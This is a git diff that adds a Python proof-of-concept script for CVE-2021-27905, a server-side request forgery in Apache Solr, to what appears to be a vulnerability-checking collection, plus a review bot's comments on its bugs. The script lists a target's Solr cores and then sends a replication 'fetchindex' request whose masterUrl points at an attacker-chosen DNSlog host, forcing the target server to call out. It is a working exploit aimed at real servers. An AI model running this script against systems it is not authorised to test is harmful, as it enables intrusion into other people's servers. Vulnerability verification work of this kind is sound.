diff --git a/cve/apache-solr/CVE-2021-27905.py b/cve/apache-solr/CVE-2021-27905.py
new file mode 100644
index 0000000000000000000000000000000000000000..7f4a64d58dfff189f6027fbd4e91a417b2d0c02b
--- /dev/null
+++ b/cve/apache-solr/CVE-2021-27905.py
@@ -0,0 +1,82 @@
+# CVE-2021-27905
+# Apache solr ssrf
+
+import requests
+import urllib3
+import json
+import sys, getopt
+urllib3.disable_warnings()
+
+
+
+
+def title():
+ print("[-------------------------------------------------------------]")
+ print("[-------------- Apache Solr SSRF漏洞 ---------------]")
+ print("[-------- CVE-2021-27905 ----------]")
+ print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]")
+ print("[-------- Author:Henry4E36 ------------]")
+ print("[-------------------------------------------------------------]")
+
+def commit():
+ url = ""
+ try:
+ opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="])
+ for op, value in opt:
+ if op == "-h" or op == "--help":
+ print("""
+ [-] Apache Solr SSRF漏洞 (CVE-2021-27905)
+ [-] Options:
+ -h or --help : 方法说明
+ -u or --url : 站点URL地址
+ -d or --dnslog : DnsLog
+ """)
+ sys.exit(0)
+ elif op == "-u" or op == "--url=":
+ url = value
+ elif op == "-d" or op == "--dnslog=":
+ dnslog = value
+ else:
+ print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
+ sys.exit()
+ return url, dnslog
+
+ except Exception as e:
+ print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
+ sys.exit(0)
+
+def target_core(url):
+ target_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
+ }
+ try:
+ res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
+ core = list(json.loads(res.text)["status"])[0]
+ return core
+ except Exception as e:
+ print(f"[!] 
目标系统: {url} 出现意外!\n ",e)
+
+def ssrf(core,dnslog):
+ target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
+ }
+ try:
+ res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
+ status = json.loads(res.text)["status"]
+ if res.status_code == 200 and status == "OK":
+ print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m")
+ else:
+ print(f"[0] 目标系统: {url} 不存在SSRF漏洞")
+
+ except Exception as e:
+ print(f"[!] 目标系统: {url} 出现意外!\n ", e)
+
+
+if __name__ == "__main__":
+ title()
+ url ,dnslog = commit()
+ core = target_core(url)
+ ssrf(core,dnslog)
+\ No newline at end of file
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 880fd7cb42863b17e1c1592232072c8a63cc67a5..f822acc2b69f179a6e97f17564d06e258e4fe60d 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -6,6 +6,8 @@ cve:
 - CVE-2021-42013
 apache-APISIX:
 - CVE-2022-24112
+ apache-solr:
+ - CVE-2021-27905
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
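Review bot: A failed core lookup in CVE-2021-27905.py is not handled: `target_core()` falls out of its `except` branch returning `None` (also when the `status` map is empty), and `__main__` passes that straight to `ssrf()`, which then queries `/solr/None/replication/` and may report the host as not affected. Stop before the check when no core was found, e.g. `if core is None: sys.exit(1)` after `core = target_core(url)`, so an inconclusive run is not read as a clean result. `ssrf(core,dnslog)` also reads `url` from the module-level name assigned under `__main__` rather than taking it as a parameter; `def ssrf(url, core, dnslog):` would make that dependency explicit. Separately, in `commit()` the comparisons against `"--url="` and `"--dnslog="` never match, because `getopt` returns long options without the trailing `=`, so the documented long forms fall into the error branch.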